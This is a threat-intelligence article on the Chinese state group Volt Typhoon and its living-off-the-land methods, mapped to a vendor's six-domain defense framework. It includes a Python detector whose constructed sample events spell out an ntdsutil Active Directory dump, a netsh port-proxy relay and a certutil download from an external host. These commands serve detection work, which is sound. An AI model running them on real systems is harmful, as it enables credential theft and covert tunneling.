# Volt Typhoon
Volt Typhoon is a People's Republic of China (PRC) state-sponsored advanced persistent threat group that has pre-positioned itself inside U.S. critical infrastructure networks with the explicit goal of enabling destructive attacks during a future military conflict. This is not an espionage operation. Volt Typhoon is not stealing intellectual property or collecting diplomatic intelligence. It is conducting the cyber equivalent of placing explosives near critical infrastructure and waiting for the order to detonate.
The group was publicly attributed to the PRC by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and partner agencies across Five Eyes nations in May 2023, via Joint Cybersecurity Advisory AA23-144A. A follow-up advisory (AA24-038A) in February 2024 specified that Volt Typhoon had maintained access inside some critical infrastructure networks for five years or more, specifically pre-positioning for "disruption or destruction of critical services in the event of a major crisis or conflict with the United States."
The targets are deliberate and strategic: energy grid operators, water and wastewater systems, transportation networks, telecommunications providers, and seaports. Geographic focus includes Guam (home to significant U.S. military infrastructure), Hawaii (Pacific Command headquarters), and critical infrastructure on the U.S. mainland that supports or is adjacent to military installations. The operational purpose is clear: if the United States and China enter military conflict over Taiwan, Volt Typhoon gives the PRC the ability to disrupt the logistics, communications, and public services that the U.S. military depends on domestically.
This is a paradigm shift in how cybersecurity professionals must think about nation-state threats. The threat is not primarily about data. The threat is about sabotage capability that sits dormant inside networks, invisible and patient, waiting for a geopolitical trigger that may be months or years away.
CISA, NSA, and FBI designated Volt Typhoon as a PRC state-sponsored actor based on technical indicators, infrastructure overlap, and target selection consistent with PRC strategic interests. The group's targeting of Guam, in particular, made strategic intent clear. Guam hosts Andersen Air Force Base and Naval Base Guam and is the westernmost U.S. territory in the Pacific: the forward operating location most critical to any U.S. military response to a Taiwan contingency.
Salt Typhoon, a parallel PRC operation that targeted U.S. telecommunications companies and compromised the communications infrastructure used by senior government officials and law enforcement wiretap systems, represents the intelligence collection complement to Volt Typhoon's pre-positioning mission. Where Salt Typhoon collects intelligence about U.S. decision-makers and communications, Volt Typhoon builds the capability to disrupt the infrastructure those decision-makers depend on. The two operations together constitute a coherent PRC strategy for achieving information dominance and infrastructure leverage over the United States in a conflict scenario.
Volt Typhoon's defining operational characteristic is its exclusive reliance on living-off-the-land (LOTL) techniques. The group does not use custom malware. It does not deploy the backdoors, remote access trojans, and custom implants that most threat intelligence frameworks are built to detect. Instead, it uses the tools that already exist on every Windows network: native operating system commands, legitimate administrative software, and built-in scripting capabilities.
Documented LOTL tools used by Volt Typhoon include:

- wmic (Windows Management Instrumentation Command-line): used for remote system management, process enumeration, and lateral movement.
- ntdsutil: a legitimate tool for Active Directory database maintenance that Volt Typhoon uses to dump Active Directory credentials in a compact, portable format.
- netsh: the Windows network configuration command-line tool, used by Volt Typhoon to configure port forwarding and proxies that tunnel traffic through compromised systems.
- PowerShell: Windows' native scripting environment, used for remote execution, reconnaissance, and data staging.
- certutil: the Windows certificate management tool, abused to download additional tools from command-and-control servers and to decode Base64-encoded payloads that pass through content filters.
The LOTL approach achieves two things simultaneously. First, it makes detection dramatically harder: there is no malicious binary to detect, no malware signature to match, and no unknown process to alert on. Security tools that focus on detecting malicious software cannot catch an attacker using only legitimate software. Second, it allows the actor to blend into the noise of normal IT operations on large networks where administrators routinely use these same tools for legitimate purposes.
Volt Typhoon consistently targets edge network devices as its initial access vector. This includes small office/home office (SOHO) routers, VPN concentrators, firewalls, and other network appliances that sit at the perimeter of target networks. These devices are frequently unpatched, run outdated firmware, have weak default credentials, and are often not monitored with the same rigor as workstations and servers.
Specific device types compromised by Volt Typhoon include Cisco, Fortinet, and NETGEAR edge devices. The group exploits publicly known vulnerabilities in these products, sometimes within days of CVE publication. Once a perimeter device is compromised, it serves two purposes: it provides persistent access to the internal network, and it becomes part of a covert relay network (KV-Botnet) that proxies Volt Typhoon's command-and-control traffic through legitimate-looking infrastructure to frustrate attribution and network traffic analysis.
The February 2024 CISA advisory documented Volt Typhoon maintaining persistent access inside critical infrastructure networks for five years or more without detection. This long-dwell capability is only possible because of the LOTL approach combined with careful operational security. The group limits data exfiltration to minimize anomalous network traffic. It operates during normal business hours in the target's time zone to blend with legitimate administrative activity. It routes traffic through compromised SOHO routers (the KV-Botnet) to make connection origins appear domestic and mundane.
The five-year dwell time means that organizations cannot rely on periodic security assessments or annual penetration tests to detect this threat. An assessment conducted in 2023 would not have caught access established in 2018 if the attacker had maintained sufficient operational security throughout.
Pre-positioning for destructive operations means establishing the access, lateral movement, and execution capability needed to cause harm at a future time of the attacker's choosing, without re-entering the network. Volt Typhoon has mapped critical infrastructure networks, identified operational technology (OT) systems that control physical processes, and established the access needed to disrupt those systems on command.
The targets are the specific systems whose disruption would impose maximum cost on U.S. military operations and civilian morale: power generation and distribution, water treatment and delivery, port logistics, transportation control systems, and the telecommunications backbone. Disrupting these systems simultaneously during the opening hours of a military conflict would strain emergency response, divert domestic attention, and complicate military logistics in ways that degrade U.S. operational capability without firing a single kinetic weapon.
Volt Typhoon represents the most serious long-term cyber threat to U.S. critical infrastructure ever publicly documented by U.S. government agencies. The significance is not technical; it is strategic. This is not an actor that broke into networks to steal data and leave. This is an actor that broke into networks to stay, map the environment, establish execution capability, and wait for a geopolitical event that may not occur for years.
The implications for how organizations think about cybersecurity are profound. Compliance-based security, which measures whether controls are in place at a point in time, cannot detect or prevent this threat. A network can pass every security audit and still host a Volt Typhoon implant built from legitimate administrative tools that no audit checklist covers. The threat requires continuous behavioral monitoring, not periodic assessment.
The geographic concentration on infrastructure adjacent to military installations confirms the strategic intent. Volt Typhoon does not appear to be collecting commercial intelligence. It is specifically targeting the infrastructure that U.S. military operations depend on domestically: power, water, logistics, and communications in the regions that host Pacific Command, Air Force installations, and naval bases.
Salt Typhoon's parallel compromise of U.S. telecommunications networks, including the infrastructure used for lawful intercept wiretaps by the FBI and other agencies, compounds the threat. The PRC has built capability to both listen to U.S. government communications and disrupt the infrastructure the U.S. government depends on. These are not separate operations; they are complementary elements of a coherent pre-conflict strategy.
Volt Typhoon is the threat that makes the case for the Planetary Defense Model more forcefully than any other actor. The group's tactics simultaneously expose weaknesses across all six PDM domains, and defense against Volt Typhoon is only effective when all six are addressed simultaneously. This is not a theoretical claim. It is a direct consequence of how Volt Typhoon operates.
VSD (Vulnerability and Surface Defense): Volt Typhoon's initial access comes through edge devices with unpatched vulnerabilities. The Continuous Surface Reduction (CSR) methodology addresses this directly: every internet-facing device is a potential initial access vector, and CSR's mandate of continuous exposure reduction applies to every SOHO router, VPN appliance, and firewall on the perimeter. Organizations that have not reduced their edge device attack surface are providing Volt Typhoon with the initial foothold it needs.
SPH (Security Posture and Hygiene): LOTL techniques defeat endpoint detection tools that rely on malware signatures. Autonomous Posture Command (APC) responds to this by establishing behavioral baselines for administrative tool usage on every system: which accounts use ntdsutil, when, from where, and for what purpose. Deviation from that baseline triggers investigation regardless of whether any malware is present. APC is specifically built for the class of threat where the attack uses no malicious software.
IAT (Identity Access and Trust): Volt Typhoon abuses legitimate administrative credentials. Zero Possession Architecture (ZPA) limits the blast radius of credential compromise through just-in-time access provisioning: administrators receive elevated access only for specific tasks during specific time windows, not standing administrative rights that an attacker can inherit. ZPA's principle of "Trust nothing. Possess nothing. Verify everything." denies Volt Typhoon the persistent administrative access it needs to move laterally and establish execution capability.
DPS (Data Protection and Sovereignty): Volt Typhoon's pre-positioning mission includes preparation for data destruction and operational technology disruption during a conflict. The Sovereign Data Protocol (SDP) ensures that critical operational data has sovereign, air-gapped backups that survive the network disruption the attack is designed to cause. SDP addresses the recovery dimension: what happens after Volt Typhoon executes its pre-positioned access.
TID (Threat Intelligence and Defense): Detection of Volt Typhoon requires behavioral threat hunting, not signature detection. Predictive Defense Intelligence (PDI) builds the detection pipeline that can find LOTL behavior: unusual netsh invocations, ntdsutil executions outside maintenance windows, PowerShell remoting to unusual endpoints, and traffic patterns consistent with the KV-Botnet relay architecture. PDI maps documented Volt Typhoon ATT&CK techniques to behavioral detection rules that fire on what the attacker does, not what tools they carry.
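The behavioral detection described in the TID paragraph above, and the LOTL tool list earlier in the article, can be made concrete. What follows is an added example, not code from the article, from CISA, or from CDA: a small Python detector that scores constructed Windows process-creation events (shaped loosely on Security event 4688 / Sysmon event 1) for the documented ntdsutil, netsh, certutil and wmic usages, and raises severity only when the event also departs from a per-tool baseline: an unexpected account, an ntdsutil run outside the maintenance window, or a parent process that indicates remote execution. The event fields, the baseline values (the CORP\svc-adbackup, CORP\netops and CORP\helpdesk accounts, the 01:00 to 03:59 window) and the sample events are all assumptions constructed for this example.

```python
"""Baseline-aware detection of living-off-the-land tool use over process-creation events.

Added example; not code from the article, from CISA or from CDA. The event shape,
the baseline values and the sample events are constructed for illustration.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from pathlib import PureWindowsPath
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (fields modelled on Security 4688 / Sysmon 1)."""
    time: datetime      # local time on the host
    host: str
    user: str           # DOMAIN\account that started the process
    parent: str         # image name of the parent process
    command_line: str


@dataclass
class Finding:
    event: ProcessEvent
    tool: str
    matches: List[str]      # suspicious argument patterns that matched
    deviations: List[str]   # ways the event departs from the baseline
    severity: str           # "high": pattern plus deviation; "low": pattern within baseline


# Constructed baseline (assumption): accounts expected to run each tool and the
# local-time hours in which Active Directory maintenance is scheduled.
EXPECTED_USERS: Dict[str, set] = {
    "ntdsutil.exe": {"CORP\\svc-adbackup"},
    "netsh.exe": {"CORP\\netops", "NT AUTHORITY\\SYSTEM"},
    "wmic.exe": {"CORP\\helpdesk"},
    "certutil.exe": {"NT AUTHORITY\\SYSTEM"},
}
MAINTENANCE_HOURS = range(1, 4)  # 01:00 to 03:59 local
# Parents that show the process was started through a remote-execution channel
# (WinRM/PowerShell remoting host, WMI provider host, PsExec service).
REMOTE_PARENTS = {"wsmprovhost.exe", "wmiprvse.exe", "psexesvc.exe"}

# Argument patterns (matched against the lower-cased command line) for the usages
# the article attributes to Volt Typhoon. A match alone is not an alert: a scheduled
# IFM backup matches too, which is why the baseline checks exist.
SUSPICIOUS_ARGS: Dict[str, List[str]] = {
    "ntdsutil.exe": [r"\bifm\b", r"\bcreate\s+full\b"],             # AD database export
    "netsh.exe": [r"\bportproxy\b.*\badd\b"],                       # port-forwarding relay
    "certutil.exe": [r"-urlcache\b", r"-decode\b"],                 # download / Base64 decode
    "wmic.exe": [r"/node:", r"\bprocess\b.*\bcall\b.*\bcreate\b"],  # remote process start
}

_FIRST_TOKEN = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')


def tool_name(command_line: str) -> str:
    """Return the lower-cased image basename from the first token of a command line."""
    m = _FIRST_TOKEN.match(command_line)
    if not m:
        return ""
    return PureWindowsPath(m.group(1) or m.group(2)).name.lower()


def analyze(event: ProcessEvent) -> Optional[Finding]:
    """Score one event: None unless a watched tool is used with a suspicious argument."""
    tool = tool_name(event.command_line)
    patterns = SUSPICIOUS_ARGS.get(tool)
    if not patterns:
        return None
    cmd = event.command_line.lower()
    matches = [p for p in patterns if re.search(p, cmd)]
    if not matches:
        return None
    deviations = []
    expected = EXPECTED_USERS.get(tool)
    if expected is not None and event.user not in expected:
        deviations.append(f"user {event.user} is not a baseline user of {tool}")
    if tool == "ntdsutil.exe" and event.time.hour not in MAINTENANCE_HOURS:
        deviations.append(f"run at {event.time:%H:%M}, outside the maintenance window")
    if event.parent.lower() in REMOTE_PARENTS:
        deviations.append(f"started by remote-execution host {event.parent}")
    return Finding(event, tool, matches, deviations, "high" if deviations else "low")


def run(events: List[ProcessEvent]) -> List[Finding]:
    """Analyze a batch of events and return the findings in input order."""
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed sample events (not real telemetry); 198.51.100.0/24 is a documentation range.
SAMPLE_EVENTS = [
    # Scheduled AD export by the backup service account inside the window: within baseline.
    ProcessEvent(datetime(2024, 2, 7, 2, 15), "dc01", "CORP\\svc-adbackup", "cmd.exe",
                 r'ntdsutil.exe "ac i ntds" ifm "create full D:\Backups\ad" q q'),
    # Same export mid-morning, by an ordinary admin account, from a WMI-spawned process.
    ProcessEvent(datetime(2024, 2, 7, 10, 42), "dc01", "CORP\\jsmith", "WmiPrvSE.exe",
                 r'ntdsutil.exe "ac i ntds" ifm "create full C:\Windows\Temp\out" q q'),
    # Port-proxy rule added on a workstation by a user account.
    ProcessEvent(datetime(2024, 2, 7, 11, 3), "ws-107", "CORP\\jsmith", "cmd.exe",
                 r"C:\Windows\System32\netsh.exe interface portproxy add v4tov4 "
                 r"listenport=9999 connectaddress=10.0.5.20 connectport=8443"),
    # Routine interface query by network operations: no suspicious argument.
    ProcessEvent(datetime(2024, 2, 7, 9, 0), "ws-042", "CORP\\netops", "cmd.exe",
                 r"netsh.exe interface ip show config"),
    # certutil used to fetch a file from an external host.
    ProcessEvent(datetime(2024, 2, 7, 11, 9), "ws-107", "CORP\\jsmith", "cmd.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\Windows\Temp\u.txt"),
]

if __name__ == "__main__":
    for f in run(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.event.host} {f.event.user} {f.tool}")
        for d in f.deviations:
            print("   -", d)
```

On the sample set the scheduled backup scores "low" (logged for audit, not alerted) while the three baseline-breaking events score "high"; argument matching alone would have flagged all four, which is the distinction the APC baseline idea draws. In production the per-tool baselines would be derived from historical telemetry rather than hand-written, and the remote-parent check is the process-level counterpart of the "PowerShell remoting to unusual endpoints" signal named above.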
RGA (Risk Governance and Assurance): Critical infrastructure operators regulated under NERC CIP, AWIA 2018, and other sector-specific frameworks have mandatory incident reporting obligations. Perpetual Compliance Assurance (PCA) ensures that compliance posture does not degrade during an active incident, a requirement that is genuinely difficult when the incident involves persistent access dating back five years that regulators must now be notified about. PCA provides the compliance infrastructure that allows organizations to respond to Volt Typhoon while maintaining regulatory standing.
CDA's Shield visualization, which displays an organization's defensive posture across all six PDM domains simultaneously, makes the all-domain exposure to Volt Typhoon visible in a single view. An organization with strong TID capability but weak VSD (unpatched edge devices) shows exactly the gap that Volt Typhoon exploits for initial access. The Shield does not let organizations hide a weak domain behind strong performance in others.
Morgan, Evan. "Eroding Global Stability: The Cybersecurity Strategies of China, Russia, North Korea, and Iran." Irregular Warfare Initiative, Princeton University / Modern War Institute at West Point, November 2025.
Cybersecurity and Infrastructure Security Agency, National Security Agency, Federal Bureau of Investigation, and partner agencies. "PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure." Joint Cybersecurity Advisory AA24-038A. February 2024.
Cybersecurity and Infrastructure Security Agency, National Security Agency, Federal Bureau of Investigation, and partner agencies. "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection." Joint Cybersecurity Advisory AA23-144A. May 2023.
Microsoft Threat Intelligence. "Volt Typhoon Targets U.S. Critical Infrastructure with Living-off-the-Land Techniques." Microsoft Security Blog, May 2023.
Lumen Technologies Black Lotus Labs. "The KV-Botnet: A Highly Sophisticated Botnet Operated by Volt Typhoon." Lumen Threat Intelligence, December 2023.
Written by Evan Morgan